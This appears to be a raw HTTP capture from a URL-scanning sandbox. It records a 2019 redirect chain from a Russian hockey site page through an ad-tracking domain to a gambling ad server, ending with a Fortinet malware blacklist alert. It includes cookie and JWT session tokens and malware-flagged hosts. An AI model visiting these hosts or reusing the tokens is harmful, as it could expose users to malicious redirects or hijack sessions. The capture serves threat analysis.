Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvP2tleT1qRUxiOFRobFpaMGxHS3ZqelF5MDIxZ1VzQVpRU0FDcyJ9fQ.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t

                                         
                                         198.134.112.242
HTTP/1.1 302 Found
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:20 GMT
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://adserving.unibet.com/redirect.aspx?bid=29694&pid=15135578&sref=ADST&ADST=14857833
Set-Cookie: uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; expires=Mon, 18 Feb 2019 05:49:20 GMT iprcd408e2a3c6b8c96cc5f26c58246a15d0=1469848; expires=Mon, 11 Feb 2019 06:49:20 GMT pdhtkv=true; expires=Tue, 12 Feb 2019 05:49:20 GMT uncs=1; expires=Tue, 12 Feb 2019 05:49:20 GMT pdhtkv28=true; expires=Tue, 12 Feb 2019 05:49:20 GMT uncs28=1; expires=Tue, 12 Feb 2019 05:49:20 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvP2tleT1qRUxiOFRobFpaMGxHS3ZqelF5MDIxZ1VzQVpRU0FDcyJ9fQ.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t; uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; iprcd408e2a3c6b8c96cc5f26c58246a15d0=1469848; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:22 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /redirect.aspx?bid=29694&pid=15135578&sref=ADST&ADST=14857833 HTTP/1.1 
Host: adserving.unibet.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /link.php?ver=2 HTTP/1.1 
Host: www.learningtoolkit.club
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Origin: http://hcmaster.ru

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware